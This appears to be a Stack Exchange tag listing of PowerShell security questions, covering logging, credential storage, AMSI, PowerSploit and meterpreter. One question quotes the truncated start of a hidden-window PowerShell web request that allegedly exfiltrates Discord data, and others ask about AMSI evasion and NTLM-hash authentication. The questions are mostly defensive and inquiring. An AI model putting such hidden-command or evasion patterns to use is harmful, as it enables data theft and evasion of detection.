Questions tagged [powershell]

Task automation and configuration management CLI for Windows; the first release was in Windows XP SP2 in 2006.

PowerShell is a CLI on Windows like CMD, but it has enhanced functionality, since it was built to create management scripts and automate system tasks.

89 questions
1
vote
0 answers

How should you configure PowerShell logs permissions?

I'm currently trying to figure out the best way to configure Windows PowerShell logging, so that: it is secure (attackers cannot gain sensitive data out of it); it helps in DFIR (digital forensic and incident response) cases. The CIS Benchmark for…
Ville
  • 19
  • 3
1
vote
2 answers

Insider threat mitigation sql databases

I support a number of applications some of which have sql databases. There's a number of scripts (mostly powershell/bash) to check the state of an application to see if it's considered healthy. Some of these scripts make calls out to the sql…
bain2236
  • 47
  • 5
1
vote
1 answer

What is this PowerShell script sending Discord info to random server?

Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing: powershell -windowstyle hidden -Command "& {&invoke-webrequest -method…
Mike Boch
  • 11
  • 1
1
vote
0 answers

How do I use ArcSight ESM to monitor PowerShell logs?

I have read mixed reviews, our team within our DoD sector suggests that ingesting the logs directly into the SIEM platform would be best and I feel that having a third party tool with signatures, look at the event and determine if it was malicious and…
md154199
  • 11
  • 1
1
vote
4 answers

Why do I get an email with address of Me'.exe'?

I am wondering if there is a security issue with this. I use Mozilla, and I got an email with Me, '.exe' . I have never seen this. What is it? Is it a way to send mass email? I searched online, and it has something to do with…
Sam
  • 11
  • 2
1
vote
0 answers

Are the interactive methods of credential gathering listed here actually secure, since they don't store the credentials on disk?

I found an article about different ways to collect and pass credentials in PowerShell. The author states that some of these methods are 100% secure (which is obviously an exaggeration) but for purposes of running a short interactive PowerShell…
leeand00
  • 1,297
  • 1
  • 13
  • 21
1
vote
0 answers

How can I safely use Get-Credential to obtain a username and password for a set period of time for use as command line arguments?

Credentials in the form of SSH keys can be stored in memory using SSH Agent; however, if clicking the wrong link, or running a malicious program they can also be snatched from memory and sent somewhere else; which is why ssh-add offers the -t…
leeand00
  • 1,297
  • 1
  • 13
  • 21
1
vote
3 answers

How can I track executed PowerShell commands within a network?

I want to track PowerShell commands which are executed by users in the intranet. How can I do this? I need the user's information and their executed commands. Is it possible? Edit 1: I guess I can use: Set-PSDebug -Trace 1. How can I build a script…
Umut Gür
  • 111
  • 1
  • 1
  • 4
1
vote
1 answer

Give users a PowerShell script to run - Secure?

Is there a secure and practical way to give a group of users a PowerShell script to run on their laptops? The users all have Active Directory accounts, but their computers are not joined to any domain. The end goal is to get a basic hardware…
whitneyland
  • 153
  • 5
1
vote
1 answer

Is it possible to export user account certificates remotely with NTLM hash authentication?

The EFS encryption uses user certificate, generated with his username and password, to encrypt the files so that only that user can access it. My question is this: Can you export user certificates remotely (using PowerShell) authenticating with NTLM…
Guesttt
  • 31
  • 1
  • 2
1
vote
1 answer

Store a text in encrypted form and use in PowerShell script without compromising it to other users?

I want to encrypt a text which I want to use in different PowerShell scripts without compromising its security as other users will be using scripts that will contain that text. Basically I want to conceal that text from everybody and use it without…
Ankit
  • 11
  • 1
1
vote
1 answer

In Windows, what's the difference between enumerating logged on users vs sessions?

I'm reading over PowerView.ps1, part of PowerSploit, and I'm wondering: what's the difference between sessions and logged on users? Get-NetLoggedon (which uses the NetWkstaUserEnum Win32 API call, and requires local admin rights) always seems to…
Sean W.
  • 835
  • 4
  • 14
1
vote
0 answers

Does running a PowerShell script using an embedded System.Management.Automation DLL prevent it from being scanned by AMSI?

A new feature called Antimalware Scan Interface, that allows AVs to 'see' PowerShell commands executed, was introduced in PowerShell v5. According to adsecurity, this feature seems to rely on the system-wide System.Management.Automation.dll…
cgcmake
  • 488
  • 1
  • 4
  • 8
1
vote
1 answer

Is it always safe to type [i.e. run Get-Content] on a file in PowerShell?

Supposedly an attacker sends me a malicious readme.txt and I'm going to open PowerShell and run type readme.txt. Can the attacker via any sort of control char sequences or using any other technique cause a non-expected behavior this way?
1
vote
3 answers

PowerShell scripts inside meterpreter sessions

I have a question I tried to answer myself without much success. I love all the PowerShell scripts provided for post exploitation purposes -> Powersploit; Nishang etc... My only problem is that I can't find any easy way to use them inside a…
r4ym0nd PenTester
  • 397
  • 1
  • 6
  • 12